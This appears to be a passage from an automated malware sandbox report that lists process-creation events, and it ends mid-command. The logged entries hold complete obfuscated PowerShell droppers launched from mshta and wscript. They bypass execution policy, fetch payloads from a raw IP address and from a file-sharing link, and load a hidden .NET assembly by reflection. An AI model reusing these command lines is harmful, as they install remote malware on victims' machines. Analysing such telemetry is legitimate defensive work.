                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, 